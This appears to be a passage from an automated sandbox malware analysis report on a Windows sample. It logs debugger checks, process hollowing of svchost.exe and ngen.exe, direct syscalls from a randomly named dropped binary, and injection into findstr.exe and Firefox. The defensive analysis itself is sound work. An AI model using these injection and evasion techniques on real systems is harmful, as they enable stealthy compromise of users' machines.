Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955152 mov eax, dword ptr fs:[00000030h] 4_2_05955152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879148 mov eax, dword ptr fs:[00000030h] 4_2_05879148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C156 mov eax, dword ptr fs:[00000030h] 4_2_0587C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov ecx, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05914144 mov eax, dword ptr fs:[00000030h] 4_2_05914144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05887152 mov eax, dword ptr fs:[00000030h] 4_2_05887152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05886154 mov eax, dword ptr fs:[00000030h] 4_2_05886154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05886154 mov eax, dword ptr fs:[00000030h] 4_2_05886154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05919179 mov eax, dword ptr fs:[00000030h] 4_2_05919179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h] 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588208A mov eax, dword ptr fs:[00000030h] 4_2_0588208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D08D mov eax, dword ptr fs:[00000030h] 4_2_0587D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B909C mov eax, dword ptr fs:[00000030h] 4_2_058B909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h] 4_2_058AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h] 4_2_058AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05885096 mov eax, dword ptr fs:[00000030h] 4_2_05885096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059460B8 mov eax, dword ptr fs:[00000030h] 4_2_059460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059460B8 mov ecx, dword ptr fs:[00000030h] 4_2_059460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h] 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059550D9 mov eax, dword ptr fs:[00000030h] 4_2_059550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059020DE mov eax, dword ptr fs:[00000030h] 4_2_059020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h] 4_2_058FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h] 4_2_058FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A90DB mov eax, dword ptr fs:[00000030h] 4_2_058A90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058880E9 mov eax, dword ptr fs:[00000030h] 4_2_058880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0587A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A50E4 mov eax, dword ptr fs:[00000030h] 4_2_058A50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A50E4 mov ecx, dword ptr fs:[00000030h] 4_2_058A50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0587C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C20F0 mov ecx, dword ptr fs:[00000030h] 4_2_058C20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h] 4_2_0589E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A020 mov eax, dword ptr fs:[00000030h] 4_2_0587A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C020 mov eax, dword ptr fs:[00000030h] 4_2_0587C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594903E mov eax, dword ptr fs:[00000030h] 4_2_0594903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592705E mov ebx, dword ptr fs:[00000030h] 4_2_0592705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592705E mov eax, dword ptr fs:[00000030h] 4_2_0592705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882050 mov eax, dword ptr fs:[00000030h] 4_2_05882050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB052 mov eax, dword ptr fs:[00000030h] 4_2_058AB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955060 mov eax, dword ptr fs:[00000030h] 4_2_05955060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov ecx, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891070 mov eax, dword ptr fs:[00000030h] 4_2_05891070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AC073 mov eax, dword ptr fs:[00000030h] 4_2_058AC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590106E mov eax, dword ptr fs:[00000030h] 4_2_0590106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD070 mov ecx, dword ptr fs:[00000030h] 4_2_058FD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A438F mov eax, dword ptr fs:[00000030h] 4_2_058A438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595539D mov eax, dword ptr fs:[00000030h] 4_2_0595539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h] 4_2_0587E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05878397 mov eax, dword ptr fs:[00000030h] 4_2_05878397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D739A mov eax, dword ptr fs:[00000030h] 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h] 4_2_058B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A33A5 mov eax, dword ptr fs:[00000030h] 4_2_058A33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593B3D0 mov ecx, dword ptr fs:[00000030h] 4_2_0593B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0588A3C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658557D00 RtlAddVectoredExceptionHandler,RaiseFailFastException, 0_2_00007FF658557D00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585B0E9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6585B0E9C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: read write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\findstr.exe Thread register set: target process: 5328
Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 400000
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\System32\svchost.exe base: 401000
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 5084008
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
